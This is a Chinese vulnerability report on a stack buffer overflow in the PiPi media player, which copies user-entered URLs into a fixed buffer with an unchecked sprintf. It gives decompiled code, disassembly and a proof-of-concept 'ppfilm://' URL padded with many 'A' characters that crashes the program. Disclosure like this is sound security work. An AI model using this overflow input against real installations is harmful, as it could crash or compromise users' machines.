简要描述:
皮皮播放器在处理用户输入的URL时,没有对其长度进行检测,从而造成溢出
详细说明:
皮皮播放器在处理用户输入的URL时,没有对其进行长度检测。
从而造成溢出。
不过,由于有GS,利用的时候有些困难
case 32780: v9 = *(_DWORD *)(wParam + 4096); v22 = 0; v21 = v9; *(_DWORD *)(wParam + 6344) = 1; sub_40D480(v21, v22); v42 = 5; if ( CDialog::DoModal(&v31) == 1 && ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::Find(&v32, "://", 0) > 0 ) { v10 = (const char *)ATL::CSimpleStringT<char_1>::operator char_const__(&v32); if ( strnicmp(v10, "ppfilm://", 9u) // 对输入的内容,比较前9位是否为ppfilm:// && (v11 = (const char *)ATL::CSimpleStringT<char_1>::operator char_const__(&v32), strnicmp(v11, "pvod://", 7u)) ) { v22 = 0; v21 = v12; v29 = &v21; ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>( &v21, &Default); v20 = v13; v28 = &v20; LOBYTE(v42) = 6; ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>( &v20, &Default); v18 = v14; *(_DWORD *)&Drive = &v18; v41 = 7; ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>(&v18); LOBYTE(v42) = 5; sub_4304F0(v3, v19, v20, v21, v22); } else { CommandLine = 0; memset(&v34, 0, 0x1FCu); v35 = 0; v36 = 0; sprintf(&CommandLine, "%s%s \"%s\"", dword_48AF30, "jfCacheMgr.exe", v32); //将输入的内容,直接调用sprintf函数,将其组合好的内容存放到CommandLine变量。 memset(&StartupInfo, 0, sizeof(StartupInfo)); ProcessInformation.hProcess = 0; ProcessInformation.hThread = 0; ProcessInformation.dwProcessId = 0; ProcessInformation.dwThreadId = 0; StartupInfo.cb = 68; CreateProcessA(0, &CommandLine, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation); if ( ProcessInformation.hThread ) CloseHandle(ProcessInformation.hThread); if ( (_DWORD)ProcessInformation.hProcess ) CloseHandle(ProcessInformation.hProcess); } } *(_DWORD *)(v3 + 6344) = 0; v42 = -1; result = sub_40D500(&v31); break;
//////////////////////////////////////////////////////////////
对传入的url没有进行检测,直接调用sprintf(&CommandLine, "%s%s \"%s\"", dword_48AF30, "jfCacheMgr.exe", v32);
函数,然后把url的值赋给CommandLine值,从而造成溢出。
我们可以看到,在函数开始的地方,
text:00430C20 push ebp
.text:00430C21 mov ebp, esp
.text:00430C23 and esp, 0FFFFFFF8h
.text:00430C26 push 0FFFFFFFFh
.text:00430C28 push offset SEH_430C20
.text:00430C2D mov eax, large fs:0
.text:00430C33 push eax
.text:00430C34 mov large fs:0, esp
.text:00430C3B sub esp, 5F8h
//一共分配了0x5F8大小的栈。
漏洞证明:
我们构造如下URL:
“ppfilm://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”
0 条评论。